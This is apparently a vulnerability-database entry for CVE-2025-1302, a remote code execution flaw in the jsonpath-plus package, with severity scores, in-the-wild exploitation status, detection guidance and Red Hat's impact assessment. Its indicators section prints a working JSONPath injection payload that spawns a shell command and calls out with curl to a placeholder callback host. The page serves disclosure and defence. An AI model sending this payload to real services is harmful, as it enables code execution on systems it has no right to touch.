cbcvebase.
CVE-2025-1302
published 2025-02-15

CVE-2025-1302: Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute…

PriorityP185critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
10.70%
95.3th percentile
Versions of the package jsonpath-plus before 10.3.0 are vulnerable to Remote Code Execution (RCE) due to improper input sanitization. An attacker can execute aribitrary code on the system by exploiting the unsafe default usage of eval='safe' mode. **Note:** This is caused by an incomplete fix for [CVE-2024-21534](https://security.snyk.io/vuln/SNYK-JS-JSONPATHPLUS-7945884).

Detection & IOCsextracted from sources · hover to see the quote

command$..[?(p="console.log(this.process.mainModule.require('child_process').execSync('curl {{interactsh-url}}').toString())";Ethan=''[['constructor']][['constructor']](p);Ethan())]
  • Exploit targets common JSON query endpoints via HTTP POST with Content-Type: application/json. Monitor POST requests to /query, /jsonpath, /api/query, /data, /parse, /filter, /expression containing JSONPath filter expressions with constructor references.
  • Successful exploitation can be confirmed via out-of-band DNS/HTTP callback (interactsh). Monitor for unexpected outbound DNS or HTTP requests originating from the Node.js process after processing JSONPath queries.
  • The vulnerability exploits the unsafe default `eval='safe'` mode in jsonpath-plus. Audit all deployments of jsonpath-plus for versions before 10.3.0 and check if user-controlled input is passed to JSONPath evaluation.
  • Payload leverages `this.process.mainModule.require('child_process')` to spawn OS commands. Alert on Node.js child_process spawning from within JSONPath evaluation contexts.
  • ·Red Hat downgraded impact to low for their products because no exploitable code paths exist in affected Red Hat products, and in OpenShift AI the jsonpath-plus dependency is never loaded.
  • ·In Red Hat OpenShift AI, jsonpath-plus is a transitive dependency and the direct dependency's feature that requires it is not used, meaning the vulnerable code is never loaded.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv4.08.9HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.